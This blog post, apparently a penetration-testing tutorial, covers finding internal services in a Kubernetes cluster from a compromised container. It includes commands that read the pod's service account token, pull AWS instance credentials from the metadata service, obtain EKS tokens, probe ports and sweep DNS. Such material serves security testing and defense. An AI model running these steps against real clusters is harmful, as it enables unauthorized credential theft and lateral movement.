<h1 id="kubernetes-internal-service-discovery">Kubernetes Internal Service Discovery</h1>
<p>This blog post talks about methods you can use from within a compromised container to discover additional accessible network services within a Kubernetes cluster. The post assumes you have obtained code execution in the compromised container, and want to use that access to attack other internal services within the cluster.</p>
<p>Some approaches discussed will require access to particular tools inside the container. You may be able to just download and run these tools if you have Internet access and sufficient permissions in the container, however I will try and suggest alternate approaches if I know of them.</p>
<p>I will also describe a number of internal Kubernetes components that can be used to help you discover other services to attack, as well as how the discovery process can be complicated by service meshes like <a href="https://istio.io/">Istio</a>.</p>
<p><strong>Note</strong>: In a Kubernetes post exploitation scenario there are other potential attack vectors you can use such as container escapes and accessing other internal networks outside the cluster that will not be discussed in this post.</p>
<h1 id="pods-and-services">Pods and services</h1>
<p>The two main types of Kubernetes components you will be interested in when looking to attack other network-accessible applications within the cluster are <a href="https://kubernetes.io/docs/concepts/workloads/pods/">pods</a> and <a href="https://kubernetes.io/docs/concepts/services-networking/service/">services</a>.</p>
<p>Pods are groups of one or more running containers, and this is where the internal networked applications you want to attack will be running. Pods have internal cluster IP addresses associated with them, and have one or more exposed network ports you can use to communicate with the networked applications.</p>
<p>Services are friendly ways of exposing applications running on one or more pods. These again have cluster IP addresses and one or more exposed ports, as well as various associated DNS records configured in the cluster’s DNS resolver. Accessing an application via its service is usually much the same as accessing it directly at the pod; however, services have additional discoverability features that can be useful to us.</p>
<p>The IP addresses used for pods will usually be in a separate private network range from those of services.</p>
<p>Now that we have established what we are looking for, let’s cover some of the methods we can use to identify these components.</p>
<h1 id="situational-awareness">Situational awareness</h1>
<p>To start, it’s useful to collect some specific information from the pod you have compromised that will help in the coming steps. The in-container examples I will be showing in this post are from the shell of a <a href="https://github.com/madhuakula/hacker-container">hacker-container</a> pod running in my test cluster, as a demonstration of having code execution in a container in the cluster.</p>
<p>In order to facilitate later discovery steps, we are looking for information such as cluster IP addresses and ports, the namespace of the pod, the API server address and any secrets or Kubernetes API authentication tokens.</p>
<p>First, check the environment variables. These often contain IP addresses and ports of other services in the cluster that can act as a starting point for discovery. Of particular interest are variables containing the string <code class="language-plaintext highlighter-rouge">KUBERNETES</code>, which point to the Kubernetes API service. See the below example from a pod within my test cluster.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# env | grep KUBERNETES
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
</code></pre></div></div>
<p>Other good sources of cluster IP addresses are the files <code class="language-plaintext highlighter-rouge">/etc/hosts</code> (giving your pod’s local IP address, which you can also obtain from the <code class="language-plaintext highlighter-rouge">ip</code> or <code class="language-plaintext highlighter-rouge">ifconfig</code> commands) and <code class="language-plaintext highlighter-rouge">/etc/resolv.conf</code> (giving the cluster’s DNS server address and the DNS search domains, from which the pod’s namespace can be inferred).</p>
<p>Here are examples of those files, revealing my pod address <code class="language-plaintext highlighter-rouge">172.16.7.159</code>, the pod name <code class="language-plaintext highlighter-rouge">hacker-container</code>, the nameserver <code class="language-plaintext highlighter-rouge">10.96.0.10</code> and the namespace of my pod <code class="language-plaintext highlighter-rouge">default</code> (from search entry <code class="language-plaintext highlighter-rouge">default.svc.cluster.local</code>):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# cat /etc/hosts
# Kubernetes-managed hosts file.
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
fe00::0 ip6-mcastprefix
fe00::1 ip6-allnodes
fe00::2 ip6-allrouters
172.16.7.159 hacker-container
bash-5.1# cat /etc/resolv.conf
search default.svc.cluster.local svc.cluster.local cluster.local thezoo.local
nameserver 10.96.0.10
options ndots:5
</code></pre></div></div>
<p>You can also look at the claims in the pod’s service account token to gather information. This token provides the default credentials the pod will use to query the Kubernetes API server, and is located by default in the file <code class="language-plaintext highlighter-rouge">/run/secrets/kubernetes.io/serviceaccount/token</code>. You can base64 decode the token’s second section to extract its claims, which include fields that point to the API server and tell you the pod name, the service account name and more.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# cat /run/secrets/kubernetes.io/serviceaccount/token | cut -d '.' -f 2 | base64 -d
{"aud":["https://kubernetes.default.svc.cluster.local"],"exp":1733371260,"iat":1701835260,"iss":"https://kubernetes.default.svc.cluster.local","kubernetes.io":{"namespace":"default","pod":{"name":"hacker-container","uid":"9beba93e-df52-4154-927c-3c30ba0f3bcf"},"serviceaccount":{"name":"default","uid":"c4dbaef1-e953-4585-990d-7c450908aa46"},"warnafter":1701838867},"nbf":1701835260,"sub":"system:serviceaccount:default:default"}
</code></pre></div></div>
<p>Also useful is <code class="language-plaintext highlighter-rouge">/run/secrets/kubernetes.io/serviceaccount/namespace</code>, which tells you the namespace in which your pod is running.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# cat /run/secrets/kubernetes.io/serviceaccount/namespace
default
</code></pre></div></div>
<p>It’s also worthwhile checking the mounted filesystems in the container using the <code class="language-plaintext highlighter-rouge">mount</code> command, to confirm that your container doesn’t have any other accessible secrets that can be used to access the API server. The default service account secret is mounted at <code class="language-plaintext highlighter-rouge">/run/secrets/kubernetes.io/serviceaccount</code>; any other mounted filesystems with <code class="language-plaintext highlighter-rouge">secret</code> or <code class="language-plaintext highlighter-rouge">serviceaccount</code> in the name are also worth looking at. Additionally, all the normal local enumeration techniques apply - e.g. look in application configuration files in the pod.</p>
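<p>As a quick illustrative check (a minimal sketch - exact secret mount locations will vary by cluster):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># list mounts that look like they hold secrets
mount | grep -iE 'secret|serviceaccount'
# recursively list anything under the standard secrets path
ls -laR /run/secrets 2>/dev/null
</code></pre></div></div>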
<h1 id="the-kubernetes-api-server">The Kubernetes API server</h1>
<p>Your first port of call to get details about pods and services in a Kubernetes cluster is the Kubernetes API. This API is the primary means by which Kubernetes clusters are configured, managed and audited, and it is definitely the easiest way to get comprehensive information on pods and services in the cluster. You do have to be authorised to use it however.</p>
<p>The previous section mentions a few ways in which you can locate the API server, which is also usually accessible from within the cluster by a default service at <code class="language-plaintext highlighter-rouge">https://kubernetes.default.svc.cluster.local/</code>.</p>
<p>So it’s quite easy to find where the API server is, but getting useful information out of it will usually be another problem.</p>
<p>By default, in more recent Kubernetes versions at least, the built-in service account represented by the token shown in the previous section won’t have any useful access to the Kubernetes API. You should still test the access this token gives you, however, just in case additional rights have been granted - the next section will go into more detail on how this can be done.</p>
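<p>If you already have kubectl available in the container (the next section covers how to get it), a quick way to enumerate exactly what a given token is allowed to do is the <code class="language-plaintext highlighter-rouge">auth can-i</code> subcommand:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" auth can-i --list
</code></pre></div></div>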
<p>As a simple example, in the case below, the service account token in this pod <strong>has</strong> been allocated extra rights, and it <strong>can</strong> list resources in its own (<code class="language-plaintext highlighter-rouge">default</code>) namespace…</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# kubectl --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" get pods -o wide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
hacker-container 2/2 Running 3 (48d ago) 48d 172.16.7.159 kubecontainer.thezoo.local <none> <none>
haproxy-77766c8866-2hf44 2/2 Running 0 46d 172.16.7.182 kubecontainer.thezoo.local <none> <none>
ichnaea-5566dd5bd7-hxccb 2/2 Running 2 (48d ago) 48d 172.16.7.145 kubecontainer.thezoo.local <none> <none>
mitmproxy-7658d6f68d-d67bh 2/2 Running 0 46d 172.16.7.184 kubecontainer.thezoo.local <none> <none>
theia-d88b7b7b4-kd99k 2/2 Running 0 28d 172.16.7.130 kubecontainer.thezoo.local <none> <none>
</code></pre></div></div>
<p>The token <strong>cannot</strong> access resources cluster wide however:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# kubectl --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" get pods -o wide --all-namespaces
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:default:default" cannot list resource "pods" in API group "" at the cluster scope
</code></pre></div></div>
<p>In a coming section, we will look at another way you might be able to get Kubernetes API access if you are inside an AWS EKS cluster, but first let’s look in some more detail at various ways in which you can use the API server to get useful information on pods and services.</p>
<h1 id="extracting-pod-and-service-information-from-the-kubernetes-api">Extracting pod and service information from the Kubernetes API</h1>
<p>The easiest way to query the Kubernetes API is to use the kubectl command line tool. If the tool is not already on the container which you have compromised (and it probably won’t be), you can easily download it if your pod has outbound Internet access.</p>
<p>You can get the version of the Kubernetes API server unauthenticated at <code class="language-plaintext highlighter-rouge">https://kubernetes.default.svc.cluster.local/version</code>, and you can get the latest available version of Kubernetes from <a href="https://kubernetes.io/releases/">here</a> (at the time of writing it is <code class="language-plaintext highlighter-rouge">1.28.4</code>).</p>
<p>Once you know what version of the tool you want, you can download it for the appropriate CPU architecture (<code class="language-plaintext highlighter-rouge">uname -a</code> in your container) from one of the following URLs - just replace <code class="language-plaintext highlighter-rouge">[VERSION]</code> in the URL with the appropriate Kubernetes version (a download example follows the list):</p>
<ul>
<li><strong>ARM64</strong> <code class="language-plaintext highlighter-rouge">https://storage.googleapis.com/kubernetes-release/release/v[VERSION]/bin/linux/arm64/kubectl</code></li>
<li><strong>AMD64</strong> <code class="language-plaintext highlighter-rouge">https://storage.googleapis.com/kubernetes-release/release/v[VERSION]/bin/linux/amd64/kubectl</code></li>
</ul>
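<p>As an example, a download for an AMD64 container might look like the following (assuming outbound Internet access and write permission in the current directory):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>VERSION=1.28.4   # substitute the version matching the target API server
curl -LO "https://storage.googleapis.com/kubernetes-release/release/v${VERSION}/bin/linux/amd64/kubectl"
chmod +x kubectl
./kubectl version --client
</code></pre></div></div>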
<p>Then, to get a list of all the running pods in the cluster, with IP addresses, you can run something like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl get pods --all-namespaces -o wide
</code></pre></div></div>
<p>The above will just list out the IP addresses of the pods; if you want to get the exposed ports too, you will need to use a more verbose output format. There are various jsonpath query options in the kubectl tool you can use to get individual field details, but when I need multiple specific fields I usually just dump all output to JSON and parse it offline. A later section of this post will show an easy way to extract the required information from the JSON output. You can get all the pod details as JSON like so.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl get pods --all-namespaces -o json > /tmp/pod_details.json
</code></pre></div></div>
<p>Services are a little easier - the below will get both IP address and port details for all services in the cluster.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl get svc --all-namespaces
</code></pre></div></div>
<p>You can also use <code class="language-plaintext highlighter-rouge">-o json</code> and redirect the output to a file to get a JSON dump here too if you like.</p>
<h2 id="kubectl-options">kubectl options</h2>
<p>The above examples of kubectl demonstrate the simplest way to use the tool, using the default options or those configured in <code class="language-plaintext highlighter-rouge">~/.kube/config</code>. If you want to try multiple authentication sources to see if there are differences in access, it’s helpful to know a few options that help you modify the way that kubectl operates.</p>
<p>The <code class="language-plaintext highlighter-rouge">--all-namespaces</code> (or <code class="language-plaintext highlighter-rouge">-A</code> for short) option might not work for you if you are not authorised to query details cluster wide (as in the service account example shown in the previous section). If that’s the case, you can try to query only specific namespaces using the <code class="language-plaintext highlighter-rouge">-n</code> option (the command <code class="language-plaintext highlighter-rouge">kubectl get ns</code> will list configured namespaces assuming you have permissions to do so).</p>
<p>See the example below, querying the <code class="language-plaintext highlighter-rouge">default</code> namespace. (The <code class="language-plaintext highlighter-rouge">default</code> namespace is what kubectl uses if you don’t explicitly configure one, although we have specified it explicitly below.)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# kubectl get pods -n default -o wide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
hacker-container 2/2 Running 3 (48d ago) 49d 172.16.7.159 kubecontainer.thezoo.local <none> <none>
haproxy-77766c8866-2hf44 2/2 Running 0 46d 172.16.7.182 kubecontainer.thezoo.local <none> <none>
ichnaea-5566dd5bd7-hxccb 2/2 Running 2 (48d ago) 49d 172.16.7.145 kubecontainer.thezoo.local <none> <none>
mitmproxy-7658d6f68d-d67bh 2/2 Running 0 46d 172.16.7.184 kubecontainer.thezoo.local <none> <none>
theia-d88b7b7b4-kd99k 2/2 Running 0 29d 172.16.7.130 kubecontainer.thezoo.local <none> <none>
</code></pre></div></div>
<p>Kubernetes supports a number of ways in which you can authenticate to the API server. You can <a href="https://thegreycorner.com/2023/11/15/kubernetes-auth-deep-dive.html">check here</a> for a deep dive into this subject.</p>
<p>One of the more commonly supported authentication methods is via JWT tokens. In the command above, kubectl is using its default setting of authenticating with the pod’s service account token <code class="language-plaintext highlighter-rouge">/run/secrets/kubernetes.io/serviceaccount/token</code>.</p>
<p>If we want to specify a particular token to use, we can do this using the <code class="language-plaintext highlighter-rouge">--token</code> option, as shown below.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# kubectl --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" get pods -o wide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
hacker-container 2/2 Running 3 (48d ago) 48d 172.16.7.159 kubecontainer.thezoo.local <none> <none>
haproxy-77766c8866-2hf44 2/2 Running 0 46d 172.16.7.182 kubecontainer.thezoo.local <none> <none>
ichnaea-5566dd5bd7-hxccb 2/2 Running 2 (48d ago) 48d 172.16.7.145 kubecontainer.thezoo.local <none> <none>
mitmproxy-7658d6f68d-d67bh 2/2 Running 0 46d 172.16.7.184 kubecontainer.thezoo.local <none> <none>
theia-d88b7b7b4-kd99k 2/2 Running 0 28d 172.16.7.130 kubecontainer.thezoo.local <none> <none>
</code></pre></div></div>
<h2 id="accessing-the-api-server-using-curl">Accessing the API server using curl</h2>
<p>If you don’t want to use kubectl to query the API server, you can also do it using a generic HTTP client like curl. The following example shows how to perform such a query.</p>
<p>We add the authorisation token (using the <code class="language-plaintext highlighter-rouge">Authorization</code> header), specify the Certificate Authority (CA) file to verify the SSL connection (<code class="language-plaintext highlighter-rouge">--cacert</code>) and perform a namespaced query for pods in the <code class="language-plaintext highlighter-rouge">default</code> namespace (using path <code class="language-plaintext highlighter-rouge">/api/v1/namespaces/default/pods</code>).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# curl -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" --cacert /run/secrets/kubernetes.io/serviceaccount/ca.crt https://kubernetes.default.svc.cluster.local/api/v1/namespaces/default/pods
[SNIP]
</code></pre></div></div>
<p>The output will be a JSON dump of all the data, similar to what would be returned by the <code class="language-plaintext highlighter-rouge">-o json</code> option in kubectl. I’ve removed it from the above output in the interests of space. It’s very detailed, so you will probably want to redirect it to disk for parsing. If you want namespaced service information instead, replace <code class="language-plaintext highlighter-rouge">pods</code> in the above with <code class="language-plaintext highlighter-rouge">services</code>.</p>
<p>The following URI paths can be used to perform cluster-wide queries for pods and services respectively, assuming you have the required permissions:</p>
<ul>
<li>/api/v1/pods</li>
<li>/api/v1/services</li>
</ul>
<p>I would suggest testing both non-namespaced and namespaced queries for both pods and services using each API authentication method you have available to you before giving up on the API, because it’s the most authoritative and easiest way to get the information you want. For namespaced queries, start with the namespace your pod is in and, if that works, try each of the others. If you can’t get the namespace list from the API (at path <code class="language-plaintext highlighter-rouge">/api/v1/namespaces</code>), read the later section on Kubernetes DNS for some ideas on how to enumerate namespaces.</p>
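<p>As a rough sketch of that testing process using curl, the following loop prints the HTTP status code for each query - 200 indicates access, 403 indicates the token lacks the necessary permission:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TOKEN="$(cat /run/secrets/kubernetes.io/serviceaccount/token)"
CACERT=/run/secrets/kubernetes.io/serviceaccount/ca.crt
APISERVER=https://kubernetes.default.svc.cluster.local
for path in /api/v1/pods /api/v1/services /api/v1/namespaces/default/pods /api/v1/namespaces/default/services; do
    echo -n "$path : "
    curl -s -o /dev/null -w '%{http_code}\n' -H "Authorization: Bearer $TOKEN" --cacert "$CACERT" "$APISERVER$path"
done
</code></pre></div></div>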
<h2 id="parsing-the-kubernetes-api-json-output-for-useful-info">Parsing the Kubernetes API JSON output for useful info</h2>
<p>Once I have API output for pods and services in JSON format, I like to parse out the useful information using iPython. See <a href="https://thegreycorner.com/2023/08/16/iPython-for-cyber-security.html">here</a> for a good overview of how I use iPython for security related processing. Below are some snippets showing how to quickly extract the useful information from JSON output for pods or services from the API (whether obtained from kubectl or via a HTTP client like curl).</p>
<p>Import the JSON module</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import json
</code></pre></div></div>
<p>Show the IP and ports for the first container in each pod.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pods = json.load(open('/tmp/pods.json'))
{a['metadata']['name'] : [[b['containerPort'] for b in a['spec']['containers'][0]['ports']], a['status']['podIP']] for a in pods['items'] if 'ports' in a['spec']['containers'][0]}
</code></pre></div></div>
<p>Show the IP and ports for each service.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>services = json.load(open('/tmp/services.json'))
{a['metadata']['name']: [a['spec']['clusterIPs'], [b['port'] for b in a['spec']['ports']]] for a in services['items']}
</code></pre></div></div>
<h1 id="authentication-to-the-kubernetes-api-using-instance-credentials-in-an-aws-eks-kubernetes-cluster">Authentication to the Kubernetes API using instance credentials in an AWS EKS Kubernetes cluster</h1>
<p>If the cluster you are attacking is an AWS EKS Kubernetes cluster, there is another option potentially available to you to authenticate to the Kubernetes API. It involves using the AWS credentials from the internal AWS metadata service to authenticate to the AWS API and obtain the related Kubernetes token. This method does require that you know the EKS cluster’s name, which you might have to guess.</p>
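<p>The AWS CLI will pick these instance credentials up automatically when run from a pod that can reach the metadata service. As a hedged illustration of where they come from, you can also query the metadata service directly, like so (IMDSv1 shown for simplicity - IMDSv2 requires requesting a session token first):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># list the names of IAM roles attached to the instance
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# fetch temporary credentials for a role found in the previous output
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE_NAME]
</code></pre></div></div>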
<p>The first thing you can try is to get the cluster name by listing known EKS clusters like so.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks list-clusters
</code></pre></div></div>
<p>If this gives you the cluster name, great! If not, you might be able to guess it, inferring from other values you find elsewhere in the cluster. The caller identity (<code class="language-plaintext highlighter-rouge">aws sts get-caller-identity</code>) of the instance’s credentials might contain the cluster name within its role name. You might also be able to come back to this step armed with new information after exploring other services in the cluster found using some of the other methods in this post. Metrics and monitoring services and key-value stores like Redis can be good sources of information for this.</p>
<p>You can test to see if you have correctly guessed the EKS cluster name by using it in a command like the following.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks describe-cluster --name [CLUSTER_NAME]
</code></pre></div></div>
<p>Once you have the correct cluster name, you can get a token you can use for API server authentication like so.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks get-token --cluster-name [CLUSTER_NAME]
</code></pre></div></div>
<p>Alternatively, if you want to use the kubectl tool, the following command will write a config file (<code class="language-plaintext highlighter-rouge">~/.kube/config</code>) that configures kubectl to automatically use a token as generated by the previous command. Once this is done, you can just run kubectl as normal.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks update-kubeconfig --name [CLUSTER_NAME]
</code></pre></div></div>
<p>Once you have an EKS token, try it against the API as discussed in the previous section - it may have more access than the pod’s service account token.</p>
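<p>If you would rather not write a kubeconfig, the token can also be extracted and passed to kubectl directly - a minimal sketch, assuming the jq tool is available to parse the JSON output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TOKEN="$(aws eks get-token --cluster-name [CLUSTER_NAME] | jq -r '.status.token')"
kubectl --token "$TOKEN" get pods --all-namespaces -o wide
</code></pre></div></div>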
<h1 id="traditional-host-and-port-discovery">Traditional host and port discovery</h1>
<p>If you can’t use the Kubernetes API, which will give you a complete list of pods, service addresses and ports, the next approach is to use more traditional discovery techniques, which we can target specifically for the peculiarities of Kubernetes.</p>
<p>Start with the IP addresses obtained as discussed in the Situational Awareness section above. We will use these known addresses to infer what the network ranges for pods and services might be.</p>
<p>The “services” range will be the one in which your Kubernetes API server (<code class="language-plaintext highlighter-rouge">10.96.0.1</code> in my example) and Kubernetes DNS server (<code class="language-plaintext highlighter-rouge">10.96.0.10</code>) reside.</p>
<p>Then there is the “pod” range, in which my pod IP (<code class="language-plaintext highlighter-rouge">172.16.7.159</code>) sits.</p>
<p>You might have found more IP addresses in your target cluster (in environment variables, local files, etc); take these into account too.</p>
<h2 id="possible-range-of-ips">Possible range of IPs</h2>
<p>Given the IP addresses collected above in my example, the possible range of IP addresses that <strong>could</strong> potentially be in use is as follows, based on the IANA private network range definitions:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>10.0.0.0 to 10.255.255.255 (16777216 hosts)
172.16.0.0 to 172.31.255.255 (1048576 hosts)
</code></pre></div></div>
<p>This is obviously a large number of addresses to scan, even for a local scan. The approach I usually like to take when discovering services across such a large network range is a two-step one: first identify live hosts, then try to identify listening services on those hosts.</p>
<p>Let’s look at some other potential complicating factors as well as exploring a Kubernetes feature that can help us identify hosts and services.</p>
<h2 id="checking-environment-behaviour">Checking environment behaviour</h2>
<p>Before we take any further steps to discover hosts at nearby addresses, we need to see how these systems respond when we try and probe them.</p>
<p>If we ping the two known IPs in the service range, we will see they don’t respond to ICMP echo requests.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# ping 10.96.0.1
PING 10.96.0.1 (10.96.0.1) 56(84) bytes of data.
^C
--- 10.96.0.1 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1025ms
bash-5.1# ping 10.96.0.10
PING 10.96.0.10 (10.96.0.10) 56(84) bytes of data.
^C
--- 10.96.0.10 ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 2030ms
</code></pre></div></div>
<p>This makes host discovery more challenging - we can’t just ping to reliably determine if an IP is assigned in the cluster. Machines not responding to pings is obviously a common issue with host discovery and network scanning, but it’s good to confirm that we need to deal with it here too.</p>
<h2 id="service-mesh-complications">Service mesh complications</h2>
<p>Certain service meshes like <a href="https://istio.io/">Istio</a> work by intercepting traffic to certain pods and services in order to provide more featureful traffic routing. In this case, components of the mesh will complete the TCP three-way handshake for all valid ports and all valid IP addresses within their configured ranges, before then forwarding the connection in the backend only if there is a configured service mesh route to a pod or service. This can have the effect of TCP ports appearing to be open even when there is nothing actually listening at the associated IP address and/or port. Port scanners that use the TCP handshake to determine if a host is live or a port is open will give you wildly inaccurate results when this occurs. In these cases you are left to rely on application level responses before you can tell whether supposedly listening TCP servers actually have something behind them.</p>
<p>The range of IP addresses within a cluster that this behaviour applies to can vary based on configuration, but you can tell it’s happening for a given IP address if every single applicable TCP port you try on the host shows as open. Consequently, if you know the cluster you are looking at uses Istio or a similar service mesh, you need to account for this when doing internal service discovery. If not, you obviously have the option to use more traditional TCP port scanning approaches to identify live hosts and ports.</p>
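<p>A quick way to check for this behaviour is to attempt TCP connections to a handful of ports that are very unlikely to all be legitimately open on one host. A rough sketch, assuming a netcat binary supporting <code class="language-plaintext highlighter-rouge">-z</code> is available in the container:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># if all of these arbitrarily chosen ports report open, suspect mesh interception
for port in 1 5555 31337 54321; do
    nc -zv -w 2 10.96.0.1 $port
done
</code></pre></div></div>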
<h2 id="kubernetes-dns-to-the-partial-rescue">Kubernetes DNS to the (partial) rescue</h2>
<p>We actually have access to a Kubernetes-specific way to identify live services (and sometimes pods) in the form of the Kubernetes DNS service.</p>
<p>This service automatically creates various DNS records for both pods and services in the cluster as discussed in the official documentation <a href="https://kubernetes.io/docs/concepts/services-networking/dns-pod-service/">here</a>.</p>
<p>There are two types of records for pods:</p>
<ul>
<li>Forward (e.g. A) records for the pod IP in the format <code class="language-plaintext highlighter-rouge"><pod-ip>.<namespace>.pod.cluster.local</code> (where dots <code class="language-plaintext highlighter-rouge">.</code> in the IP address are replaced with dashes <code class="language-plaintext highlighter-rouge">-</code>), and</li>
<li>Forward (A) and reverse (PTR) records for any pod exposed by a service at <code class="language-plaintext highlighter-rouge"><pod-ip>.<service-name>.<namespace>.svc.cluster.local</code>.</li>
</ul>
<p>And for services there are:</p>
<ul>
<li>Forward (A) and reverse (PTR) records for each service in the form <code class="language-plaintext highlighter-rouge"><service-name>.<namespace>.svc.cluster.local</code>, and</li>
<li>Service (SRV) records for each listening port of the service in the form <code class="language-plaintext highlighter-rouge">_<port-name>._<port-protocol>.<service-name>.<namespace>.svc.cluster.local</code>.</li>
</ul>
<p>Unfortunately, the first pod record type is useless for host discovery purposes, as there are no reverse entries, and forward lookups for any valid IPv4 address in any valid namespace will succeed regardless of whether the address is assigned to a pod in the cluster.</p>
<p>For example, using this pod address pattern to check the IP address <code class="language-plaintext highlighter-rouge">127.0.0.1</code> in the <code class="language-plaintext highlighter-rouge">default</code> namespace works fine.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# dig +short 127-0-0-1.default.pod.cluster.local
127.0.0.1
</code></pre></div></div>
<p>The only useful enumeration purpose we can achieve with these records is brute forcing valid namespaces - the <code class="language-plaintext highlighter-rouge">default</code> namespace in the above can be replaced with any other namespace, and a result will be returned as long as that namespace exists in the cluster.</p>
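<p>A simple namespace brute force using this behaviour might look like the following sketch (the candidate wordlist here is illustrative only and should be extended):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># the lookup only resolves when the namespace exists, regardless of the IP used
for ns in default kube-system kube-public istio-system argocd dev test prod; do
    [ -n "$(dig +short 127-0-0-1.${ns}.pod.cluster.local)" ] && echo "namespace exists: ${ns}"
done
</code></pre></div></div>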
<p>The reverse (PTR) records however are much more useful.</p>
<p>If we do reverse DNS lookups on our known IPs, we can see that the service IPs both have inverse lookup entries, but the pod IP does not.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# dig +short -x 10.96.0.10
kube-dns.kube-system.svc.cluster.local.
bash-5.1# dig +short -x 10.96.0.1
kubernetes.default.svc.cluster.local.
bash-5.1# dig +short -x 172.16.7.159
bash-5.1#
</code></pre></div></div>
<p>This lines up with the documentation - the services both have reverse DNS entries, but the pod (which in this case is not associated with a service) does not. This gives us a way to identify cluster IP addresses associated with services, as well as pod IP addresses that are backed by services, by doing reverse DNS lookups across applicable network ranges. This will identify all IPs associated with services and most of the ones associated with pods, and will help narrow down the potential IP ranges in use for each. We will look at an example of this in the next section.</p>
<p>The other record type mentioned above was SRV records. Taking the most obvious example of the default Kubernetes API service, we can get the associated SRV record for the https port like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# dig +short SRV _https._tcp.kubernetes.default.svc.cluster.local
0 100 443 kubernetes.default.svc.cluster.local.
bash-5.1# dig +short _https._tcp.kubernetes.default.svc.cluster.local
10.96.0.1
</code></pre></div></div>
<p>This tells us the TCP port that the service listens on (443), as well as a priority (0) and weight (100) for this particular endpoint. We can also see above that if we request the A record for that name, we get the expected service IP address, which should exist for all DNS SRV records.</p>
<p>This does give us a way to identify all listening ports associated with a service once we know its DNS name; however, the port names come from potentially arbitrary values provided in the service definition, and not all of them are as obvious as <code class="language-plaintext highlighter-rouge">https</code>.</p>
<p>To demonstrate this, I will use the Kubernetes API from my Kubernetes host system to perform a describe operation on the <code class="language-plaintext highlighter-rouge">jaeger-collector</code> service that comes with Istio (and runs in the <code class="language-plaintext highlighter-rouge">istio-system</code> namespace), so we can see what some of the service port names are:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubecontainer:~$ kubectl describe service jaeger-collector -n istio-system
Name: jaeger-collector
Namespace: istio-system
Labels: app=jaeger
Annotations: <none>
Selector: app=jaeger
Type: ClusterIP
IP Family Policy: SingleStack
IP Families: IPv4
IP: 10.97.213.168
IPs: 10.97.213.168
Port: jaeger-collector-http 14268/TCP
TargetPort: 14268/TCP
Endpoints: 172.16.7.142:14268
Port: jaeger-collector-grpc 14250/TCP
TargetPort: 14250/TCP
Endpoints: 172.16.7.142:14250
Port: http-zipkin 9411/TCP
TargetPort: 9411/TCP
Endpoints: 172.16.7.142:9411
Port: grpc-otel 4317/TCP
TargetPort: 4317/TCP
Endpoints: 172.16.7.142:4317
Port: http-otel 4318/TCP
TargetPort: 4318/TCP
Endpoints: 172.16.7.142:4318
Session Affinity: None
Events: <none>
</code></pre></div></div>
